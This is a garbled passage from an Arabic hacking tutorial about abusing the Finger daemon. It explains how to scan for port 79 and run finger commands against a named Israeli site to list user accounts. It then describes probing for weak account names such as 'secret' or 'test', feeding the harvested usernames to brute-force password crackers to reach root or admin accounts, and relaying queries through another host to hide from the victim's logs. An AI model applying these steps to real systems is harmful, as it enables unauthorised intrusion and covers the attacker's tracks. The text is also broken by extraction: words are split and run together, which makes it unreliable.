‫ﺘﻌﻤ ﻞ ﻋﺎﻣﺔ ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻄﻼبﻓﻲاﻟﺠﺎﻣﻌﺎ ت ﺎذاارادوا ﻣﻌﻠﻮﻣﺎ تﺗﺨ ﺺ ﻃﻼب‬ ‫ـ ‪Finger‬ﺈﺳ‬ ‫ﻓﻲ ﺎﻟﻤﺎ ﺿﻲ ‪،‬اﻟ‬
‫ا ﺧ ﺮﯾﻦﻓﻲ ﻧﻔ ﺲاﻟﺠﺎﻣﻌﻪ ‪ .‬وﻛﺜﯿ ﺮا ﻣﺎﺗﻜﻮناﻷﺟﺎﺑﺔ )اﺟﺎﺑﺔ ) ‪Finger Deamon‬ﺑﺠ ﻤﻠﺔ ‪" Finger‬‬
‫" !‪me‬ﺎي "أﻋﻠﻤﻨﻲ ! "‬
‫ﻗﻊاﻟﻮﯾﺐ‬‫ﻗ ﻞ ﺷﻬ ﺮة ‪،‬ﻷﻧﻪﺗﻮﺟﺪاﻵن ﻣﻮا‬ ‫ﺘ ﺮﻧ ﺖ ﺎﻟﻌﺎﻟﻤﯿﺔاﺻﺒﺢ‪ Finger‬أ‬ ‫ﺄﻣﺎاﻵن وﻣﻊ وﺟﻮد ﺷﺒﻜﺔاﻹﻧ‬
‫ﺘﻬﺪﯾﺪ‬‫ﺘ ﺮﻧ ﺖ وﺑﺴﺒﺐ ﻣﻼ ﺣﻈﺔاﻟﻨﺎساﻟ‬‫ﺘﺨﺪﻣﯿﻦاﻷﻧ‬ ‫ﻗﻤﯿﺔ ﺧﺎﺻﺔﺑﻤﺴ‬ ‫ﻗﺔ ﻋﻤ ﻞ )‪ (bisinesscard‬ﺮ‬ ‫ﻟﻠﻌﻤ ﻞﻛﺒﻄﺎ‬
‫ﺘﺨﺪام ﺧﺪﻣﺔ‪Finger Deamon‬‬ ‫ّاﺳ‬ ‫ﺘ ﺮوﻧﻲﻗ ﻞ‬‫ﺎﻟﻮاﺳﻊﻟﻸﻣﻦاﻷﻟﻜ‬

‫ﻗﻊ )اﻷﻧﻈﻤﺔ(ﺗﻘﺪمﻫﺬه ﺎﻟﺨﺪﻣﺔ‪ .‬وﻫﺬه‬‫ﺘﺠﺪﺑﻌ ﺾاﻟﻤﻮا‬ ‫ﻋﻠﻰأﯾﺔ ﺣﺎ ل‪،‬ﻟﯿ ﺲﻛ ﻞاﻷﻧﻈﻤﺔ ﻣﻨﻌ ﺖﻫﺬهاﻟﺨﺪﻣﺔ وﺳ‬
‫ﺘﺨﺪامﺑ ﺮاﻣ ﺞ ‪ portscans‬ﻟﻠﺒ ﺤﺚ ﻋﻦاﻟﺒﻮرﺗﺎ ت‬
‫ﺘ ﺮا قاﻷﻧﻈﻤﺔﺑﺄﺳ‬‫اﻷﯾﺎم ﯾﻘﻮماﻟﻬﻜ ﺮزﺑﻤ ﺤﺎوﻻ تا ﺧ‬
‫ّأﺳﺎس ﻋﻠﻤﻲ ‪.‬‬ ‫ﺘﻮ ﺣﺔ‪. . .‬ﺑﺪونأي‬ ‫اﻟﻤﻔ‬
‫ﺘﺰودكﺑﻜﻤﯿﺔ ﺿﺨﻤﺔ ﻣﻦ ﺎﻟﻤﻌﻠﻮﻣﺎ ت‬‫ﺘﺨﺪاﻣﻬﺎﻗﺎﻧﻮﻧﯿﺎﻟ‬
‫ّ ‪ Finger‬ﺪﯾﻤﻮن‪ ،‬ﻣﺜﺎ ل ﻋﻈﯿﻢﻟﺨﺪﻣﺔ ﯾﻤﻜﻦاﺳ‬ ‫ﻟﺬﻟﻚإن‬
‫ّﺎﺳﺔ‬‫اﻟ ﺤ ﺴ‬

‫‪٢٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺣﻮ ل ﻫﺪ ف‪.‬‬
‫ﻟﻬﺬا ﺳﻮ فأ ﺣﺎو لاناﺷ ﺮ حﻓﻲ ﻫﺬااﻟﺪرسﺑﻠﻐﺔ ﻣﻔﻬﻮﻣﺔ‬
‫ﺘﻚ ‪:‬‬‫ﺘﺨﺪاﻣﻪﻓﻲ ﻣﺼﻠ ﺤ‬ ‫ﻣﺎ ﻫﻮ ‪ Finger‬ﺪﯾﻤﻮن وﻣﺎذا ﯾﻔﻌ ﻞ وﻛﯿ ﻒ ﯾﻤﻜﻦاﺳ‬
‫ﺘﺨﺪﻣﯿﻦ‬
‫ﺘﺨﺪ مﻟﺠﻠﺐاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦ اﻟﻤﺴ‬‫اﻟﺨﻼﺻﺔاﻟﻤﻘﺪﻣﺔ‪:‬ان ﺧﺪﻣﺔ ‪Finger‬ﻛﺎﻧ ﺖﻗﺪﯾﻤﺎ وﻻزاﻟ ﺖﺗﺴ‬
‫اﻟﻤﻮﺟﻮدﯾﻦﻓﻲاﻟﻨﻈﺎم وﻫ ﻞﻟﺪﯾﻬﻢ ﺣﺴﺎﺑﺎ تﻓﻲ ﻫﺬااﻟﻨﻈﺎمام ﻻ‪.‬‬

‫ﻗﻊ‬
‫ﺘ ﻀﺎﻓﺔاﻟﻤﻮا‬
‫ﺘﺨﺪمﻓﻲاﺳ‬
‫ﻣﻼ ﺣﻈﺔ ‪:‬اﻟﻨﻈﺎم ) ‪( server‬ﻫﻮ ﺟﻬﺎزﻛﻤﺒﯿﻮﺗ ﺮﺗﺨﺰنﻓﯿﻪ ﻣﻌﻠﻮﻣﺎ تﻫﺎﺋﻠﺔ ﻮﯾﺴ‬

‫ﺘﺨﺪام‪Finger‬‬
‫‪1.3‬ﺎﺳ‬
‫>=================<‬

‫ﻗﻊ ﻣﻌﯿﻦ )ﻣﺜﻼ‬‫ﺘﺨﺪاماي ﻣﻦﺑ ﺮاﻣ ﺞاﻟﺴﻜﺎن ﺎﻟﻤﻌ ﺮوﻓﺔ ﻣﺜ ﻞ ) ‪(superscan‬ﻟﻠﺒ ﺤﺚﻓﻲ ﻣﻮ‬ ‫ﻋﻨﺪاﺳ‬
‫ﺘﻮ ﺣﺎﻫﺬا ﯾﻌﻨﻲان‬‫‪ ) http://www.israel.com/‬ﻮوﺟﺪ تﺑﻪ ﻣﻨﻔﺬ ‪(Port‬ﺑﻮر ت( ‪ ٧٩‬ﻣﻔ‬
‫‪http://www.israelr.com/‬‬
‫ﻟﻪ ‪ Finger‬ﺪﯾﻤﻮن ﯾﻌﻤ ﻞ‪.‬‬
‫ﺘﻌﻼم؟ ﻋﻦ ﻃ ﺮﯾ ﻖ وﻧﺪوز‬ ‫ـ )‪ (request‬ﻃﻠﺐاﺳ‬ ‫ﺎﻵنﻛﯿ ﻒ ﻧﻘﻮمﺑ‬
‫ـ ‪ Finger‬ﻣ ﺮﻛﺐ ) ‪( installed‬ﻟﺬﻟﻚ‬ ‫ﻓﻲأﻏﻠﺐاﻷ ﺣﯿﺎن وﻧﺪوز ﻻ ﯾﻮﺟﺪﺑﻪ زﺑﻮن )‪ (client‬ﺧﺎ صﻟﻠ‬
‫ـ ‪Finger‬‬ ‫ﺘﺨﺪم ‪Telnet‬ﻛﺨﺎدمﻟ‬ ‫ﺳﻮ ف ﻧﺴ‬
‫‪--‬ﺗﻮ ﺿﯿﺢ‪--‬‬
‫‪Telnet(client) --------request-------> Finger Deamon(in Server) o‬‬
‫ﺘﺎﺑﺔاﻟﺴﻄ ﺮ ﺎﻵﺗﻲﻓﻲ ﻣﻮﺟﺔاﻟﺪوس‪(MS DOS ) :‬‬ ‫ﻋﻦ ﻃ ﺮﯾ ﻖﻛ‬
‫‪79http://www.foobar.com/telnet‬‬
‫ﺑﻌﺪ ذﻟﻚ ﺳﯿﻈﻬ ﺮﻟﻚﺑ ﺮﻧﺎﻣ ﺞ ‪ telnet‬ﻮ ﻣﻨﻪﺗﻄﺒﻊاﻷواﻣ ﺮ ‪.‬‬
‫ﺘﻌﻤ ﻞﺗﯿﻠﻨ ﺖﻷﻧﻪ ﯾﻮﺟﺪﺑﻨﻈﺎمﻟﯿﻨﻮﻛ ﺲ زﺑﻮن)‪ (client‬ﺧﺎ صﺑﺨﺪﻣﺔ‬ ‫ﺎﻣﺎ ﻣﻦ ﯾﻮﻧﯿﻜ ﺲﻟﺴﻨﺎﺑ ﺤﺎﺟﺔإﻟﻰأن ﻧﺴ‬
‫ّﺐ ﻋﻠﻰ ﺎﻟﻨﻈﺎمﺑﺸﻜ ﻞ داﺋﻢﺗﻘ ﺮﯾﺒﺎ‪.‬‬‫‪ Finger Deamon‬ﻣ ﺮﻛ‬
‫ﺘﺨﺪام‬ ‫ﺘﻤ ﺮارﺑﺄﺳ‬‫ﺘﺨﺪﻣﻲﻟﯿﻨﻮﻛ ﺲأﻣﺎأذاﻗ ﺮر تاﻷﺳ‬ ‫ﺘﻰ ﻧﻬﺎﯾﺔاﻟﺪرسﻟﻤﺴ‬ ‫ﺘﺎﻟﻲ ﺣ‬‫ﻣﻼ ﺣﻈﺔ ‪ :::‬ﺳﯿﻜﻮناﻟﺸ ﺮ حاﻟ‬
‫ﺘﻲ‬ ‫ﺘﺎﺑﺔاﻷواﻣ ﺮﻫﻲ ﻧﻔ ﺲ ﺎﻷواﻣ ﺮاﻟ‬
‫ﺘﻜﻮنﻛ‬ ‫ﺘﻠﻨ ﺖ وﺳ‬ ‫ﺘﺎﺑﺔاﻷواﻣ ﺮﻓﻲ ﻣﻮﺟﻪاﻟﺪوسﺛﻢﻓﻲاﻟ‬ ‫ﺘﻜﻮنﻛ‬ ‫ﻮﻧﺪوز ﺳ‬
‫ﻗﻊ‬ ‫ﺘﺨﺪام ﻧﻈﺎمﻟﯿﻨﻮﻛ ﺲ وﻟﻜﻦﺑﺪ ل "@" ﻧ ﻀﻊ "ﻣﺴﺎﻓﺔﺛﻢ "‪www‬ﻓﻲ ﺎﻟﻮﻧﺪوز ﻣ ﺮاﻋﯿﺎاﺳﻢاﻟﻤﻮ‬ ‫ﺘﺐﺑﺄﺳ‬ ‫ﺗﻜ‬
‫ﺘﺎﺑﺔاﻷواﻣ ﺮﻓﻲﻟﯿﻨﻮﻛ ﺲ ﻫﻜﺬا ‪:‬‬ ‫ﻣﺜﻼ ﯾﻜﻮنﻛ‬
‫‪finger@anyname.com‬‬
‫ﻮﻟﻜﻦﻓﻲ وﻧﺪوز ﺳﯿﻜﻮنﻫﻜﺬا ‪http://www .anyname.com/finger :‬‬
‫ﻻ ﺣﻆاﻟﻤﺴﺎﻓﺔﺑﯿﻦ ‪ finger‬ﻮ ‪www‬‬
‫ﺘﺨﺪم ) ‪( unix shell‬‬ ‫ﺘ ﺮا ضاﻧﻚﺗﺴ‬ ‫ﺎ ﻃﺒﻊﻓﻲ ﻣ ﺤﺚاﻷواﻣ ﺮﻓﻲ ﯾﻮﻧﻜ ﺲ ) ﻋﻠﻰاﻓ‬
‫‪finger@israel.com‬‬
‫ﻗﻊ ( ﻫﻨﺎ ﻫﻮ ‪http://www .israel.com/‬ﻛﻤﺜﺎ ل‬ ‫ﺘﺨﺪﻣﻲﻫﺬااﻟﻤﻮ‬ ‫ﻻ ﺣﻆاناﻟﻬﺪ ف )ﻟﻤﻌ ﺮﻓﺔ ﻣﻦﻫﻢ ﻣﺴ‬
‫ﺘﺎﺋ ﺞ‪:‬‬‫ﺘﻈﻬ ﺮاﻟﻨ‬
‫ﻓﺴ‬
‫‪Login: Name: Tty: Idle: When: Where:‬‬
‫‪root israel sys console 17d Tue 10:13 node0ls3.israel.com‬‬
‫>‪Amos Amanda <.......> <.......> <.......‬‬
‫‪Anderson Kenneth‬‬
‫‪Bright Adrian‬‬
‫‪Doe John‬‬

‫‪٣٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫>‪Johnson Peter <.......> <.......> <.......‬‬


‫‪Mitnick Kevin‬‬
‫‪Munson Greg‬‬
‫‪Orwell Dennis‬‬
‫ﺘﺎﺋ ﺞ؟‬‫ﺎﻵن ﻣﺎذاﺗﻌﻨﻲ ﻫﺬهاﻟﻨ‬
‫ﺘﻌﻤﻠﯿﻦ وﻓﻲاﻟﺜﺎﻧﻲ" )‪ (Name‬ﺎﻷﺳﻤﺎ ءاﻟ ﺤﻘﯿﻘﯿﺔ"‪،‬‬ ‫ﻓﻲاﻟﻌﻤﻮداﻷو ل) ‪ ( login‬ﻧ ﺮىﺄﺳﻤﺎ ءاﻟﻤﺴ‬
‫ﻗ ﺖ ﺣﻘﯿﻘﺔ‪ .‬وﯾ ﺮﯾﻨﺎاﻟﻌﻤﻮداﻟﺜﺎﻟﺚ)‪ (Tty‬ﺎﻟﻨﻮ عاﻟﻄ ﺮﻓﻲ ‪the‬‬
‫ﺘﻲﺑﺎﻟﻄﺒﻊﻟﯿﺴ ﺖ ﺣﻘﯿﻘﯿﺔ‪،‬ﻟﻜﻦﻓﻲ ﻣﻌﻈﻢاﻟﻮ‬ ‫ﺎﻟ‬
‫‪terminal type‬‬
‫ﻗ ﺖ واﻟﻤﻜﺎن‬‫ﻗ ﻒ‪ the idle time.‬وﺑﻌﺪ ذﻟﻚﻓﻲ ﺎﻟﻌﻤﻮدﯾﻦاﻟﺨﺎﻣ ﺲ واﻟﺴﺎدساﻟﻮ‬ ‫ﺘﻮ‬ ‫ﺘ ﺮةاﻟ‬
‫ﻮاﻟ ﺮاﺑﻊ )‪(Idle‬ﻓ‬
‫ﺘﺨﺪمﻓﯿﻪاﻟ ﺤﺴﺎبﻟﻸﺗﺼﺎ لﺑﺎﻟﻨﻈﺎم‪.‬‬ ‫اﻟﺬياﺳ‬
‫ﺘﺨﺪﻣﯿﻦ ﻫﺬااﻟﻨﻈﺎم ﻮإذاﻛﻨ ﺖﺗ ﺮﯾﺪ‬‫ﻗﺎم ﻫﻮاﺗ ﻒ ‪..‬اﻟ ﺦاﻟﺨﺎ ﺻﺔﺑﻤﺴ‬‫ﺄ ﺣﯿﺎﻧﺎﺗﻮﺟﺪأﻋﻤﺪةﺑﻌﻨﻮاوﯾﻦاﻷﯾﻤﯿﻼ ت وأر‬
‫ﺘ ﺮ ﺟﻮﻧﺴﻦ ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل(أد ﺧ ﻞاﻷﻣ ﺮ‬
‫ّﻦ ‪(Johnson Peter‬ﺑﯿ‬ ‫ﺘﺨﺪم ﻣﻌﯿ‬‫اﻟﻤﺰﯾﺪ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦ ﻣﺴ‬
‫ﺘﺎﻟﻲ‪:‬‬‫اﻟ‬
‫‪johnson@israel.comfinger‬‬

‫ﺘﺨﺪام ﺧﺪﻣﺔ‪Finger‬‬ ‫‪1.4‬ﺑﻌ ﺾاﻟﺨﺪ ع ﻋﻨﺪاﺳ‬


‫========================= <‬
‫ّﻰاﻵن ﺷﺎﻫﺪ ت ﻣﺎاﻟ ﻀﻌ ﻒ ﺎﻟ ﺮﺋﯿﺴﻲﻟﺨﺪﻣﺔ ‪ Finger deamon ..... Finger.‬ﯾ ﺮﯾﻚ ﻣﺎﻫﻲ‬ ‫ﺄﺗﻤﻨ‬
‫اﻟ ﺤﺴﺎﺑﺎ تاﻟﻤﻮﺟﻮده ﻋﻠﻰ ﺎﻟﻨﻈﺎم‪ .‬وﻫﺬا ﯾﻌﻨﻲأﻧﻚﺗﻜﺴﺐ )ﻋﻦ ﻃ ﺮﯾ ﻖﻗﺎﻧﻮﻧﻲ ( ‪ % ٥٠‬ﻣﻦاﻟﻤﺠﻤﻮﻋﺔ‬
‫ﺘﻤﻨ ﺤﻚاﻟﺪ ﺧﻮ ل)‪(Access‬ﺈﻟﻰ ﻧﻈﺎم‪.‬‬ ‫ﺘﻲ ﺳ‬ ‫ﺘﺨﺪﻣﯿﻦاﻟ‬ ‫اﻟﺴ ﺤ ﺮﯾﺔ ﻮﻫﻲﻛﻠﻤﺎ تاﻟﺴ ﺮ‪/‬ﻣﺠﻤﻮﻋﺔأﺳﻤﺎ ءاﻟﻤﺴ‬
‫ﻗﻔﻪ ﻋﻠﻰﺑ ﺮﻧﺎﻣ ﺞ ‪bruteforce‬ﺄوﺑﻤﻌﻨﻰ آ ﺧ ﺮ‬ ‫ﺘﻮ‬‫ﺘﻜﻮناﻟﺨﻄﻮةاﻟﻘﺎدﻣﺔ ﻣ‬ ‫ﺘﺨﺪﻣﯿﻦ‪ ،‬ﺳ‬ ‫إذا ﻋ ﺮﻓ ﺖأﺳﻤﺎ ءاﻟﻤﺴ‬
‫ﺑ ﺮاﻣ ﺞﺗﺨﻤﯿﻦاﻟﺒﺎﺳﻮورد ‪wordlist passowrd cracker‬‬
‫ﻗﻊ‬‫ﺘﯿﻠﻨ ﺖ ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ لاذﻫﺐﻟﻤﻮ‬ ‫ﺘﺒ ﺖﻟﻠ‬‫ّﺔﻛ‬‫ﺘﺎ ت ﺧﺎ ﺻ‬‫ﻫﻨﺎك ﺳﻜ ﺮﺑ‬
‫‪http://www.thehackerschoice.com/‬ﺄواﺑ ﺤﺚ ﻋﻦ‪VLAD's pwscan.pl‬‬
‫ﻟﺬﻟﻚ ﯾﺠﺐ ﻋﻠﯿﻚانﺗﻜﻮنﻗﺎﺋﻤﺔﺑﻜﻠﻤﺎ تاﻟﺴ ﺮﻓﻲ ﻣﻠ ﻒ ﻧﺼﻲ ‪ (word‬ﺎو ﺎﻟﻤﻔﻜ ﺮه( و ﺣﺎو لانﺗﻜﻮنﻛﻠﻤﺎ ت‬
‫ﺘﺨﺪمﺑ ﺮﻧﺎﻣ ﺞ‪bruteforce -‬ﺄﻧﺼ ﺤﻚﺑﻬﺬا‬ ‫ﺘﺨﺪﻣﯿﻦ وإذاﻟﻢﺗﻌﻤ ﻞ ﺎﻟﻘﺎﺋﻤﺔاﺳ‬ ‫ﻗ ﺮﯾﺒﺔ ﻣﻦأﺳﻤﺎ ءاﻟﻤﺴ‬ ‫اﻟﺴ ﺮ‬
‫ﺘ ﺮا ﺣﺔ ﻮﺗﺠﻌ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ ﯾﻌﻤ ﻞ ﻋﻤﻠﻪ‪-‬‬
‫ﻗ ﺖانﺗ ﺤﻈ ﺮﻟﻚﻛﺄس ﺷﺎﻫﻲ وﺗﺄ ﺧﺬﻟﻚاﺳ‬ ‫اﻟﻮ‬
‫ﺘﺨﺪﻣﯿﻦﻟﻠﻨﻈﺎماﻛﺜ ﺮاﻫﻤﯿﺔ ﻣﻦ ﻏﯿ ﺮﻫﺎ ﻣﻦاﻟ ﺤﺴﺎﺑﺎ ت‪ .‬و ﺧﺎﺻﺔ ﺣﺴﺎباﻹدارة‬ ‫ﺑﺎﻟﻄﺒﻊ ﻧﺠﺪﺑﻌ ﺾاﻟ ﺤﺴﺎﺑﺎ تﻟﻠﻤﺴ‬
‫ﻗﻊ‬ ‫ﺘ ﺤﻜﻢﺑﺎﻟﻤﻮ‬ ‫ﺘﻄﯿﻊاﻟ‬ ‫ﺘﻬﺎﺗﺴ‬ ‫ﻗ‬
‫)‪(Admin‬ﺄو ﺎﻟﺠﺬر )‪(root‬ﺑﺴﺒﺐاﻧﻪ ﻋﻨﺪﻣﺎﺗﻌ ﺮ فاﻟﺒﺎﺳﻮورداﻟﺨﺎ صﺑﻬﻢ ﻮ‬
‫‪ .‬وﺑﺎﻟﻄﺒﻊﺑﻌ ﺾاﻟ ﺤﺴﺎﺑﺎ ت ﺳﻬﻠﺔﺗﺨﻤﯿﻦﻛﻠﻤﺔاﻟﺴ ﺮ ‪ .‬وﻫﻨﺎﻟﻚﺑﻌ ﺾاﻟﺨﺪ عﻟﻤﻌ ﺮﻓﺔﻫﺬااﻟﻨﻮ ع ﻣﻦاﻟ ﺤﺴﺎﺑﺎ ت‪.‬‬
‫ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل ‪...‬إ ﻃﺒﻊاﻷﻣ ﺮ‪:‬‬
‫‪secret@israel.comfinger‬‬
‫ﺘﻮي ﻋﻠﻰﻛﻠﻤﺔ‬ ‫ﺘﻲﺗ ﺤ‬ ‫ﻋﻨﺪﻣﺎﺗ ﺮﺳ ﻞ ﻫﺬا ﺎﻷﻣ ﺮاﻟﻲ ‪ Finger Deamon‬ﺳﯿﻌﻄﯿﻚ ﺟ ﻤﯿﻊاﻟ ﺤﺴﺎﺑﺎ تاﻟ‬
‫ﺘﻌﻤ ﻞأواﻹﺳﻢاﻟ ﺤﻘﯿﻘﻲ‪.‬اذا‪ ،‬ﻣﺎﻫﻮاﻟﺸﻲاﻟﻤﻬﻢﻓﻲ ﻫﺬا؟ ﺣﺴﻨﺎأﻧ ﺖ ﯾﻤﻜﻨﻚأن‬ ‫ّﺎﻓﻲاﺳﻢاﻟﻤﺴ‬ ‫"‪"secret‬ﺄﻣ‬
‫ﺘﻤ ﻞان ﯾﻜﻮن‬‫ﺘﻌﻤ ﻞ "‪"test‬ﺄو "‪"temp‬ﺄو "‪"٠٠٠٠‬ﺑﺪﻻ ﻣﻦ "‪ "secret‬ﻮﻛﻤﺎﺗﻌ ﺮ ف ﻣﻦ ﺎﻟﻤ ﺤ‬ ‫ﺗﺴ‬
‫ﻫﺬااﻟﻨﻮ ع ﻣﻦاﻟ ﺤﺴﺎﺑﺎ ت ﺳﻬ ﻞ ﻣﻌ ﺮﻓﺔﺑﺎﺳﻮورداﺗﻪﻓﻲأﻏﻠ ﺐ ﺎﻷ ﺣﯿﺎن‪.‬‬
‫‪finger .@israel.com‬‬
‫‪0@israel.comfinger‬‬
‫ﺟ ﺮب ﻫﺬهاﻷواﻣ ﺮ وﺷﺎﻫﺪ ﻣﺎ ﯾ ﺤﺪ ث!‬
‫ﻗ ﺮأ ‪RFC‬ﻮأوﺟﺪ ﺧﺪﻋﻚﺑﻨﻔﺴﻚ!‬ ‫ﺘﻌ ﺮ ف ﻋﻠﻰ ‪Finger Deamon،‬ﺄ‬ ‫ﺣﺎو لاﻟ‬

‫‪٣١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺨﺪام‪Finger‬‬ ‫ﻗﻊﺑﺄﺳ‬ ‫ﺘﻌﻼم ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻮ‬ ‫‪1.5‬ﺎﻷﺳ‬


‫========================= <‬
‫ﺘﻌﻠﻢ"(‬‫ﺘﺨﺪم ﺧﺪﻣﺔ( ‪ Finger‬ﻣﻌﻨﻰ ‪Finger‬ﻛﻔﻌ ﻞ "أﻟﻤ ﺲ" وﻟﻜﻨﻬﺎﺗﺄﺗﻲﻫﻨﺎﺑﻤﻌﻨﻰ "اﺳ‬ ‫ﺈذاأرد تاناﺳ‬
‫ﻗﻊ آ ﺧ ﺮ‬‫ﻗﻊ ﻣﻌﯿﻦ ﻣﺜ ﻞﻫﺬا‪ www.victim.com‬وأﯾ ﻀﺎﺗﻌ ﺮ فأن ﻣﻮ‬ ‫ﺘﻌﻼم ﻋﻦ ﻣﻮ‬ ‫واﻷﺳ‬
‫"‪"www.host.com‬ﯾﻘﺪم ﺧﺪﻣﺔ ‪Finger‬ﺗﻌﻤ ﻞ‪،‬‬
‫ﺘﺐﻓﻲ ﻣ ﺤﺚاﻷواﻣ ﺮ ﻣﺜ ﻞ ﻫﺬا( ‪finger@host.com‬‬ ‫ﻗﺪم ﻃﻠﺒﺎ ﻣﺜ ﻞ ﻫﺬا‪):‬اﻛ‬‫ﻋﻨﺪﻫﺎ ﯾﻤﻜﻨﻨﻲانأ‬
‫‪@victim.com‬‬
‫ﺘﺎﺋ ﺞ‪.‬‬
‫ﺘﻌﻠﻢ )‪ (Finger‬ﺎﻵن ‪ victim.com‬ﻮﯾ ﺮﯾﻚاﻟﻨ‬ ‫‪ Host.com‬ﯾﺴ‬
‫ﺘﻜﻮن ﻣﺠﻬﻮ لﻟﺪى‪ victim.com‬ﻓﻌﻨﺪﻣﺎﺗﻘﻮم‬ ‫ﺄ ﺣﺪاﻟﻔﻮاﺋﺪ ﻣﻦ ﻫﺬهاﻟﻄ ﺮﯾﻘﺔاﻧﻚ ﺳ‬
‫‪http://www.victim.com/‬‬
‫ﺘﺸﺎﻫﺪ ‪http://www.host.com/‬ﻓﻲ ﺳﺠﻼﺗﻬﻢ‪،‬ﺑﺪﻻ ﻣﻨﻚ ‪.‬‬ ‫ﺑﻄﻠﺐ ﺳﺠ ﻞ )اﻟﺪ ﺧﻮ ل )‪ log‬ﺳ‬
‫ﺘﻌﻼم ﻋﻦ‬ ‫ﻗﻊ( ﯾﻘﻮم ) ﻋﻦ ﻃ ﺮﯾ ﻖ ﺧﺪﻣﺔ) ‪Finger‬ﺑﺎﻷﺳ‬ ‫ﺘ ﺮك( ‪ Host‬ﻣﻮ‬ ‫ﻓﺎﺋﺪةا ﺧ ﺮى وﻫﻲأﻧﻚ ﯾﻤﻜﻦانﺗ‬
‫ﺣﺎﺳﻮﺑﺎ‬
‫ﺘﺨﺪام ﺧﺪﻣﺔ ‪ Finger‬ﻣﻦ ﺟﻬﺎزكﻟﻦﺗﻜﻮن‬ ‫ﺘﻌﻼمﺑﺄﺳ‬ ‫ﺂ ﺧ ﺮا ﻋﻠﻰ ﻧﻔ ﺲاﻟﺸﺒﻜﺔ ‪،‬ﺑﯿﻨﻤﺎاذا ﻃﻠﺒ ﺖاﻧ ﺖﻫﺬا ﺎﻷﺳ‬
‫ﺘﺨﺪام‬‫ﺘﻌﻼمﺑﺎﺳ‬ ‫ﺘﻌﻠﻢ ﻋﻨﻪﺑﻌﻜ ﺲاذاﻛﺎناﻟﻄﻠﺐﻟﻸﺳ‬ ‫ﻣﺴﻤﻮ ﺣﺔﻟﻚﻷﻧﻚ ﺳﺄﻛﻮن ﻏﯿ ﺮ ﻣﻮﺛﻮ قﺑﻪﻟﺪىاﻟﻤﺴ‬
‫ﻗﻊ ‪.‬‬ ‫‪Finger‬ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻮ‬
‫ﺛﻮ قﺑﻪﺑﻌﻜ ﺲ ﺎذاﻛﺎن‬ ‫ﺘﺒ ﺮ ﺣﺎﺳﻮﺑﻚ ﺎﻟﺸﺨﺼﻲ ﻏﯿ ﺮ ﻣﻮ‬ ‫ﺘﻌﻼم ﻋﻨﻪ ﯾﻌ‬
‫ﻗﻊاﻟﺬيﺗ ﺮﯾﺪاﻷﺳ‬ ‫ﯾﻌﻨﻲاﻟﺨﻼ ﺻﺔ ‪:‬اناﻟﻤﻮ‬
‫ﻗﻊا ﺧ ﺮ ﯾﺸﺎﺑﻬﻪﻓﺴﻮ ف ﯾﺴﻤﺢﻟﻪ !‪.‬‬ ‫ﺘﻌﻼم ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻮ‬ ‫اﻷﺳ‬

‫ﺘﺎج ﻣﻦ ﻫﺬا ﺎﻟﺪرس‬


‫ﺘﻨ‬
‫‪1.6‬ﺎﻷﺳ‬
‫>===============<‬

‫‪Finger Deamon‬ﯾﻤﻜﻦأن ﯾﻜﻮن ﻣﺼﺪر ﻣﻌﻠﻮﻣﺎ ت ﺿﺨﻢﻷي وا ﺣﺪ ﯾ ﺤﺎو لﻛﺴﺐاﻟﺪ ﺧﻮ ل ) ‪( access‬‬


‫إﻟىﺎﻟﻨﻈﺎم‪.‬‬
‫ﺘﺎﺟﻬﺎﻟﻜﺴﺐ‬ ‫ﺘﻲﺗ ﺤ‬‫ﺘﺨﺪﻣﯿﻦاﻟ‬ ‫ّدكﺑﻨﺼ ﻒﻛﻠﻤﺎ تاﻟﺴ ﺮ واﺳﻤﺎ ءاﻟﻤﺴ‬ ‫‪Finger deamon‬ﻗﺎﻧﻮﻧﯿﺎ ﯾﺰو‬
‫اﻟﺪ ﺧﻮ ل‪access.‬‬
‫ﺘﻄﯿﻊ‬
‫ﺘﻚﻟﻬﺬهاﻟ ﺤﺴﺎﺑﺎ تﺗﺴ‬ ‫ﻫﻨﺎكﺑ ﻀﻌﺔ ﺧﺪ عﻟﻄﯿﻔﺔﺗﻤﻜﻨﻚ ﻣﻦ ﻣﻌ ﺮﻓﺔ ﺣﺴﺎﺑﺎ ت ﺧﺎﺻﺔﺗﺒ ﺤﺚ ﻋﻨﻬﺎ ﻣﻦ ﻣﻌ ﺮﻓ‬
‫ﺘﻌﻤﺎ لﺗﻘﻨﯿﺔ ‪wordlist‬ﺄو‪bruteforce.‬‬ ‫ﻛﺴ ﺮاﻟﺒﺎﺳﻮوردا ت ‪،‬ﺑﺈﺳ‬
‫ﺘﻌﻤﺎ ل‪... Finger deamon‬‬ ‫ﻗﻊ"أﯾ ﻀﺎﺑﺄﺳ‬‫ﺘﻌﻼم ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻮ‬ ‫ّ ﺮﻓﻮاﺋﺪ "اﻷﺳ‬
‫ﺗﺬﻛ‬

‫‪٣٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"ﺷﺮح اﻟـ ‪"secure shell‬‬

‫‪$$$$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪ACID BURN_EG:‬‬
‫‪$$$$$$$$$$$$$$$$$$$‬‬
‫ﻗﺪاﺳﺒﻘﻬﺎاﻟﻜﺎﺗﺐﺑﻤﻘﺪﻣﺔ ﻣﻦ ﻋﻨﺪه ‪....‬‬

‫ﻗﻊ و‬
